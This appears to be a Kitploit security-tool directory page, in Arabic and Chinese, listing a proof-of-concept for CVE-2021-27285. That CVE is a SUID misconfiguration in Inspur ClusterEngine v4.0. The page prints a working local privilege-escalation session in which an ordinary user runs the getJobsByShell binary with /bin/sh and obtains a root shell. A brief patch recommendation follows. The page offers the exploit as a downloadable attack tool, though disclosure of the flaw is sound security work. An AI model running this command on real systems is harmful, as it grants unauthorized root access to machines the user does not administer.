Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/fjh1997/cve-2021-27285
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاختبار الاختراقالفريق الأحمراستغلال الملفات الثنائية
GitHubfjh1997/cve-2021-27285

CVE-2021-27285

استغلال إثبات المفهوم لسوء تهيئة SUID في Inspur ClusterEngine (CVE-2021-27285) الذي يمكّن المستخدمين غير المسؤولين من رفع صلاحياتهم إلى الجذر عبر مكون getJobsByShell.

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-27285

浪潮ClusterEngine集群管理平台是专为浪潮天梭系列HPC产品定制的一款作业管理软件。浪潮ClusterEngine存在suid配置不当的问题,导致非管理员用户可以通过部分组件进行提权获得root权限。

منصة إدارة مجموعات Inspur ClusterEngine هي برنامج إدارة مهام مصمم خصيصًا لمنتجات HPC من سلسلة Inspur TianSuo. يؤدي سوء تكوين إعدادات SUID في Inspur ClusterEngine إلى السماح للمستخدمين غير الإداريين برفع الصلاحيات والحصول على وصول الجذر (root) من خلال بعض المكونات.

浪潮clusterenginev4.0存在组件“/opt/tsce4/torque6/bin/getJobsByShell”suid配置不当问题,非管理员用户能通过suid提权方式获得root权限。

يحتوي Inspur ClusterEngine v4.0 على مشكلة في تكوين SUID غير صحيح مع المكون "/opt/tsce4/torque6/bin/getJobsByShell"، مما يسمح للمستخدمين غير الإداريين برفع الصلاحيات والحصول على وصول الجذر (root) عبر آلية SUID.

عملية رفع الصلاحية هي كما يلي:

root@kitploit:~
[inspur@mu01 ~]$ whoami
inspur
[inspur@mu01 ~]$ /opt/tsce4/torque6/bin/getJobsByShell /bin/sh
sh-4.2# whoami
root
sh-4.2#

修复建议: 升级相关组件

توصية: تصحيح المكونات ذات الصلة.

تنزيل الأداة